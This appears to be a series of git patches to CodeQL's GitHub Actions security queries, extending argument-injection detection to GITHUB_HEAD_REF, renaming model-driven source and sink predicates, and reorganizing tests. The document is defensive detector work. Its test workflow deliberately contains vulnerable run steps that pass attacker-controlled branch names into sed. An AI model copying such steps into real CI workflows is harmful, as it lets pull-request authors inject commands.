b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -23,8 +23,19 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { ArgumentInjectionFromEnvVarSink() { exists(Run run, string var_name | envToArgInjSink(var_name, run, command) and - exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() + run.getScriptScalar() = this.asExpr() and + exists(run.getInScopeEnvVarExpr(var_name)) + ) + or + exists( + Run run, string line, string argument, string regexp, int argument_group, int command_group + | + run.getScript().splitAt("\n") = line and + run.getScriptScalar() = this.asExpr() and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and + argument = line.regexpCapture(regexp, argument_group) and + command = line.regexpCapture(regexp, command_group) and + argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") ) } @@ -45,7 +56,19 @@ class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink { * that is used to construct and evaluate a code script. */ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource + or + exists( + Run run, string argument, string line, string regexp, int command_group, int argument_group + | + run.getScriptScalar() = source.asExpr() and + run.getScript().splitAt("\n") = line and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and + argument = line.regexpCapture(regexp, argument_group) and + argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") + ) + } predicate isSink(DataFlow::Node sink) { sink instanceof ArgumentInjectionSink } } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index a0bf48f9beb8..be0229a77c4b 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -62,7 +62,7 @@ predicate containsHeadRef(string s) { // heuristics "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bpr_head_ref\\b", // env vars - "\\benv\\.GITHUB_HEAD_REF\\b", + "GITHUB_HEAD_REF", ], _, _) ) } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml index 0956aea61bdb..3f2f30a78a03 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -15,3 +15,8 @@ jobs: - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar - run: echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) - run: awk "BEGIN {$TITLE}" + - run: sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json + - run: | + # We consider | as a shell pipe so this one is not reported yet until + # we can better identify all the commands in a shell script + sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json From c5d31ce08c1d66a7965d79ee805927efd68605d1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 10:13:49 +0200 Subject: [PATCH 404/707] fix(refactor): Add comments and rename predicates --- .../codeql/actions/dataflow/ExternalFlow.qll | 43 ++++++++++++------- .../codeql/actions/dataflow/FlowSources.qll | 4 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 35 +++++++-------- .../dataflow/internal/DataFlowPrivate.qll | 18 +++----- .../security/ArgumentInjectionQuery.qll | 2 +- .../actions/security/CodeInjectionQuery.qll | 2 +- .../security/CommandInjectionQuery.qll | 2 +- .../security/EnvPathInjectionQuery.qll | 2 +- .../actions/security/EnvVarInjectionQuery.qll | 2 +- .../actions/security/RequestForgeryQuery.qll | 2 +- .../security/SecretExfiltrationQuery.qll | 2 +- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- 13 files changed, 61 insertions(+), 57 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 2cb8c56b147f..1d1b0c6a7199 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -10,7 +10,9 @@ private import actions * - output arg: To node (prefixed with either `env.` or `output.`) * - provenance: verification of the model */ -predicate actionsSourceModel(string action, string version, string output, string kind, string provenance) { +predicate actionsSourceModel( + string action, string version, string output, string kind, string provenance +) { Extensions::actionsSourceModel(action, version, output, kind, provenance) } @@ -39,12 +41,17 @@ predicate actionsSummaryModel( * - kind: sink kind * - provenance: verification of the model */ -predicate actionsSinkModel(string action, string version, string input, string kind, string provenance) { +predicate actionsSinkModel( + string action, string version, string input, string kind, string provenance +) { Extensions::actionsSinkModel(action, version, input, kind, provenance) } -predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { - exists(Uses uses, string action, string version, string kind | +/** + * Holds if source.fieldName is a MaD-defined source of a given taint kind. + */ +predicate madSource(DataFlow::Node source, string kind, string fieldName) { + exists(Uses uses, string action, string version | actionsSourceModel(action, version, fieldName, kind, _) and uses.getCallee() = action.toLowerCase() and ( @@ -59,36 +66,40 @@ predicate externallyDefinedSource(DataFlow::Node source, string sourceType, stri if fieldName.trim().matches("output.%") then source.asExpr() = uses else none() - ) and - sourceType = kind + ) ) } -predicate externallyDefinedStoreStep( - DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c -) { +/** + * Holds if the data flow from `pred` to `succ` is a MaD store step. + */ +predicate madStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Uses uses, string action, string version, string input, string output | actionsSummaryModel(action, version, input, output, "taint", _) and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and + // version check ( if version.trim() = "*" then uses.getVersion() = any(string v) else uses.getVersion() = version.trim() ) and + // pred provenance ( - if input.trim().matches("env.%") - then pred.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) - else - if input.trim().matches("input.%") - then pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) - else none() + input.trim().matches("env.%") and + pred.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) + or + input.trim().matches("input.%") and + pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) ) and succ.asExpr() = uses ) } -predicate externallyDefinedSink(DataFlow::Node sink, string kind) { +/** + * Holds if sink is a MaD-defined sink for a given taint kind. + */ +predicate madSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | actionsSinkModel(action, version, input, kind, _) and uses.getCallee() = action.toLowerCase() and diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 34f8c76df67d..31cf33782b0b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -95,10 +95,10 @@ class GitHubEventJsonSource extends RemoteFlowSource { /** * A Source of untrusted data defined in a MaD specification */ -class ExternallyDefinedSource extends RemoteFlowSource { +class MaDSource extends RemoteFlowSource { string sourceType; - ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } + MaDSource() { madSource(this, sourceType, _) } override string getSourceType() { result = sourceType } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index a40e11bda956..5e624798d69a 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -23,14 +23,18 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -bindingset[var_name, value] -predicate envToRunExpr(string var_name, Run run, string value) { +/** + * Holds if and environment variable is used, directly or indirectly, in a Run's step expression. + * Where the expression is a string captured from the Run's script. + */ +bindingset[var_name, expr] +predicate envToRunExpr(string var_name, Run run, string expr) { // e.g. echo "FOO=$BODY" >> $GITHUB_ENV // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + expr.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV - value.matches("$(echo %") and value.indexOf(var_name) > 0 + expr.matches("$(echo %") and expr.indexOf(var_name) > 0 or // e.g. // FOO=$(echo $BODY) @@ -40,13 +44,18 @@ predicate envToRunExpr(string var_name, Run run, string value) { var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and ( - value.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") + expr.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") or - value.matches("$(echo %") and value.indexOf(var2_name) > 0 + expr.matches("$(echo %") and expr.indexOf(var2_name) > 0 ) ) } +/** + * Holds if an environment variable is used, directly or indirectly, as an argument to a dangerous command + * in a Run step. + * Where the command is a string captured from the Run's script. + */ bindingset[var_name] predicate envToArgInjSink(string var_name, Run run, string command) { exists(string argument, string line, string regexp, int command_group, int argument_group | @@ -131,18 +140,6 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo ) } -// predicate dISABLEDenvToOutputStoreStep( -// DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c -// ) { -// exists(Run run, string var_name, string content, string key, string value | -// writeToGitHubOutput(run, content) and -// extractVariableAndValue(content, key, value) and -// c = any(DataFlow::FieldContent ct | ct.getName() = key) and -// pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and -// succ.asExpr() = run and -// value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") -// ) -// } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, string var_name, string content, string key, string value | writeToGitHubEnv(run, content) and @@ -180,7 +177,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF c = any(DataFlow::FieldContent ct | ct.getName() = key) and download.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and - // we store the taint on the enclosing job since the may not exist an implicit env attribute + // we store the taint on the enclosing job since there may not be an implicit env attribute succ.asExpr() = run.getEnclosingJob() ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index ec889f19205a..47cd38d47fab 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -86,9 +86,7 @@ class DataFlowCall instanceof Cfg::Node { int totalorder() { none() } /** Gets the location of this call. */ - Location getLocation() { - result = this.getLocation() - } + Location getLocation() { result = this.getLocation() } } /** @@ -119,10 +117,8 @@ class DataFlowCallable instanceof Cfg::CfgScope { /** Gets a best-effort total ordering. */ int totalorder() { none() } - /** Gets the location of this callable. */ - Location getLocation() { - result = this.getLocation() - } + /** Gets the location of this callable. */ + Location getLocation() { result = this.getLocation() } } newtype TReturnKind = TNormalReturn() @@ -225,7 +221,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Uses astFrom, StepsExpression astTo | - externallyDefinedSource(nodeFrom, _, "output." + ["*", astTo.getFieldName()]) and + madSource(nodeFrom, _, "output." + ["*", astTo.getFieldName()]) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getTarget() = astFrom @@ -242,7 +238,7 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { */ predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Uses astFrom, NeedsExpression astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + madSource(nodeFrom, _, "output." + astTo.getFieldName()) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getTarget() = astFrom @@ -282,7 +278,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) + madSource(nodeFrom, _, "env." + astTo.getFieldName()) or astTo.getTarget() = astFrom or @@ -382,7 +378,7 @@ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { */ predicate storeStep(Node node1, ContentSet c, Node node2) { fieldStoreStep(node1, node2, c) or - externallyDefinedStoreStep(node1, node2, c) or + madStoreStep(node1, node2, c) or envToOutputStoreStep(node1, node2, c) or artifactToOutputStoreStep(node1, node2, c) or envToEnvStoreStep(node1, node2, c) or diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index c13db5b81275..37f966668df6 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -46,7 +46,7 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. */ class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink { - ArgumentInjectionFromMaDSink() { externallyDefinedSink(this, "argument-injection") } + ArgumentInjectionFromMaDSink() { madSink(this, "argument-injection") } override string getCommand() { result = "unknown" } } diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll index c2453cb1652e..8cd589fa9f8c 100644 --- a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll @@ -7,7 +7,7 @@ import codeql.actions.DataFlow class CodeInjectionSink extends DataFlow::Node { CodeInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "code-injection") + madSink(this, "code-injection") } } diff --git a/ql/lib/codeql/actions/security/CommandInjectionQuery.qll b/ql/lib/codeql/actions/security/CommandInjectionQuery.qll index 8eda87f1cae5..59d523cd5827 100644 --- a/ql/lib/codeql/actions/security/CommandInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/CommandInjectionQuery.qll @@ -5,7 +5,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.DataFlow private class CommandInjectionSink extends DataFlow::Node { - CommandInjectionSink() { externallyDefinedSink(this, "command-injection") } + CommandInjectionSink() { madSink(this, "command-injection") } } /** diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index e81c6954d72f..41e72bc83885 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -44,7 +44,7 @@ class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { } class EnvPathInjectionFromMaDSink extends EnvPathInjectionSink { - EnvPathInjectionFromMaDSink() { externallyDefinedSink(this, "envpath-injection") } + EnvPathInjectionFromMaDSink() { madSink(this, "envpath-injection") } } /** diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 869134215634..f5a3b5f89a8e 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -46,7 +46,7 @@ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { } class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { - EnvVarInjectionFromMaDSink() { externallyDefinedSink(this, "envvar-injection") } + EnvVarInjectionFromMaDSink() { madSink(this, "envvar-injection") } } /** diff --git a/ql/lib/codeql/actions/security/RequestForgeryQuery.qll b/ql/lib/codeql/actions/security/RequestForgeryQuery.qll index 80e3d93ee69a..ca0ac267131f 100644 --- a/ql/lib/codeql/actions/security/RequestForgeryQuery.qll +++ b/ql/lib/codeql/actions/security/RequestForgeryQuery.qll @@ -5,7 +5,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.DataFlow private class RequestForgerySink extends DataFlow::Node { - RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } + RequestForgerySink() { madSink(this, "request-forgery") } } /** diff --git a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll index 1886af435cfb..0317ab281990 100644 --- a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll +++ b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll @@ -6,7 +6,7 @@ private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow private class SecretExfiltrationSink extends DataFlow::Node { - SecretExfiltrationSink() { externallyDefinedSink(this, "secret-exfiltration") } + SecretExfiltrationSink() { madSink(this, "secret-exfiltration") } } /** diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 3ea9050c8322..b5ce78fe062a 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - sink instanceof CodeInjectionSink and not externallyDefinedSink(sink, "code-injection") + sink instanceof CodeInjectionSink and not madSink(sink, "code-injection") } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 5f1c54e70034..6da9acda9060 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - sink instanceof CodeInjectionSink and not externallyDefinedSink(sink, "code-injection") + sink instanceof CodeInjectionSink and not madSink(sink, "code-injection") } } From 29d2b287c9e1d7538211d4dfaadc5174351ceef3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 10:14:39 +0200 Subject: [PATCH 405/707] tests: Organize tests --- .../security/ArtifactPoisoningQuery.qll | 2 + ...logs_gh-action-get-changed-files.model.yml | 10 + .../library-tests/poisonable_steps.expected | 3 +- ql/test/library-tests/test.expected | 247 ++++++++++-------- .../.github/workflows/artifactpoisoning1.yml | 61 ----- .../.github/workflows/artifactpoisoning3.yml} | 0 .../.github/workflows/artifactpoisoning4.yml} | 0 .../.github/workflows/artifactpoisoning5.yml | 23 ++ .../.github/workflows/artifactpoisoning6.yml | 30 +++ .../.github/workflows/artifactpoisoning7.yml | 24 +- .../.github/workflows/artifactpoisoning8.yml | 22 ++ .../CWE-094/CodeInjectionCritical.expected | 45 +++- .../CWE-094/CodeInjectionMedium.expected | 38 ++- .../.github/workflows/artifactpoisoning12.yml | 2 +- ...poisoning8.yml => artifactpoisoning71.yml} | 0 .../ArtifactPoisoningCritical.expected | 14 +- .../CWE-829/ArtifactPoisoningMedium.expected | 10 +- .../CWE-829/UnpinnedActionsTag.expected | 3 +- .../UntrustedCheckoutCritical.expected | 12 +- 19 files changed, 318 insertions(+), 228 deletions(-) create mode 100644 ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml rename ql/test/query-tests/Security/{CWE-829/.github/workflows/artifactpoisoning61.yml => CWE-094/.github/workflows/artifactpoisoning3.yml} (100%) rename ql/test/query-tests/Security/{CWE-829/.github/workflows/artifactpoisoning7.yml => CWE-094/.github/workflows/artifactpoisoning4.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning8.yml rename ql/test/query-tests/Security/CWE-829/.github/workflows/{artifactpoisoning8.yml => artifactpoisoning71.yml} (100%) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index dd409bdbae28..541498ae574c 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -254,6 +254,8 @@ class ArtifactPoisoningSink extends DataFlow::Node { poisonable.(UsesStep) = this.asExpr() ) and ( + // Check if the poisonable step is a local script execution step + // and the path of the command or script matches the path of the downloaded artifact not poisonable instanceof LocalScriptExecutionRunStep or poisonable .(LocalScriptExecutionRunStep) diff --git a/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml b/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml new file mode 100644 index 000000000000..a437dc2c4f29 --- /dev/null +++ b/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["lots0logs/gh-action-get-changed-files", "*", "output.all", "PR changed files", "manual"] + - ["lots0logs/gh-action-get-changed-files", "*", "output.added", "PR changed files", "manual"] + - ["lots0logs/gh-action-get-changed-files", "*", "output.modified", "PR changed files", "manual"] + - ["lots0logs/gh-action-get-changed-files", "*", "output.renamed", "PR changed files", "manual"] + diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 55105c39bdfa..96dca7f0308f 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -27,4 +27,5 @@ | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 08f9136f2e50..62b04344f392 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -6,20 +6,20 @@ files workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -74,7 +74,8 @@ steps | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | @@ -131,7 +132,8 @@ runSteps | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | ./foo/cmd | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -224,7 +226,8 @@ runStepChildren | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | @@ -377,138 +380,142 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | 